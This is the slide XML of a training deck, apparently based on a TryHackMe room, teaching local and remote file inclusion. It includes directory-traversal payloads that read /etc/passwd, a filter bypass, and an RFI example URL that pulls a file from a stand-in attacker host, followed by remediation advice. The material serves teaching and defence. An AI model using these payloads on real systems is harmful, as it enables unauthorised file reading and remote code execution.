              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>since dot refers to the current directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> Next, in the following scenarios, the developer starts to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>input validation by filtering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>some keywords. Let's test out and check the error message!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://webapp.thm/index.php?lang=../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>If we check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>warning message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>in the include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(languages/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>) section, we know that the web application replaces the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>empty string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. There are a couple of techniques we can use to bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>this.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136478" y="4217158"/>
            <a:ext cx="12055522" cy="9553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GB" dirty="0"/>
              <a:t>Warning: include(languages/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>): failed to open stream: No such file or directory in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/www/html/THM-5/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> on line 15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20108120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a:t>First</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, we can send the following payload to bypass it:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ....//....//....//....//....//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Why did this work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This works because the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP filter only matches and replaces the first subset string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> it finds and doesn't do another pass, leaving what is pictured below.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC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092" y="1665635"/>
            <a:ext cx="10058400" cy="3720230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1562112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dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Finally, we'll discuss the case where the developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>forces the include to read from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a defined directory! For example, if the web application asks to supply input that has to include a directory such as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> http://webapp.thm/index.php?lang=languages/EN.php then, to exploit this, we need to include the directory in the payload like so: ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=languages/../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3439920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endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Inclusion - RFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2253671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Remote File Inclusion (RFI) is a technique to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include remote files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>into a vulnerable application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. Like LFI, the RFI occurs when improperly sanitizing user input, allowing an attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inject an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>external URL into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> function. One requirement for RFI is that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> option needs to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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982639"/>
            <a:ext cx="10058400" cy="6214761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2843395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RFI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The following figure is an example of steps for a successful RFI attack! Let's say that the attacker hosts a PHP file on their own server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://attacker.thm/cmd.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> contains a printing message  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Hello THM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>First, the attacker injects the malicious URL, which points to the attacker's server, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. If there is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no input validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, then the malicious URL passes into the include function. Next, the web app server will send a GET request to the malicious server to fetch the file. As a result, the web app includes the remote file into include function to execute the PHP file within the page and send the execution content to the attacker. In our case, the current page somewhere has to show the Hello THM message.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98426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2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" u="sng" dirty="0"/>
              <a:t>is File inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>This room aims to equip you with the essential knowledge to exploit file inclusion vulnerabilities, including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>Local File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Inclusion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>(LFI), Remote File Inclusion (RFI), and directory traversal. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>In some scenarios, web applications are written to request access to files on a given system, including images, static text, and so on via parameters. Parameters are query parameter strings attached to the URL that could be used to retrieve data or perform actions based on user input. The following graph explains and breaking down the essential parts of the URL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800"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209" y="2464617"/>
            <a:ext cx="7225737" cy="3431216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5711228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3200" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Remediation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Keep system and services, including web application frameworks, updated with the latest version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>A Web Application Firewall (WAF) is a good option to help mitigate web application attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> on and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Carefully </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> the web application and allow only protocols and PHP wrappers that are in need.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Never trust user input, and make sure to implement proper input validation against file inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Implement whitelisting for file names and locations as well as blacklisting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3200" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3018831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b="1" u="sng" dirty="0"/>
              <a:t>Steps for testing for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>LFI:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enter a valid input to see how the web server behaves.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enter invalid inputs, including special characters and common file names.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Don't always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Understand the input validation and if there are any filters!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Try the inject a valid entry to read sensitive files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247890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Let's discuss a scenario where a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>user requests to access files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>from a webserver. First, the user sends an HTTP request to the webserver that includes a file to display. For example, if a user wants to access and display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>their CV within the web application, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the request may look as follows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://webapp.thm/get.php?file=userCV.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, where the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> is the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>userCV.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, is the required file to access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>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13" y="1864491"/>
            <a:ext cx="10170908" cy="4699504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3634818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b="1" dirty="0"/>
              <a:t>Why do File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>inclusion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>vulnerabilities happen?﻿</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>File inclusion vulnerabilities are commonly found and exploited in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>various programming languages for web applications, such as PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> that are poorly written and implemented. The main issue of these vulnerabilities is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the input validation, in which the user inputs are not sanitized or validated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, and the user controls them. When the input is not validated, the user can pass any input to the function, causing the vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
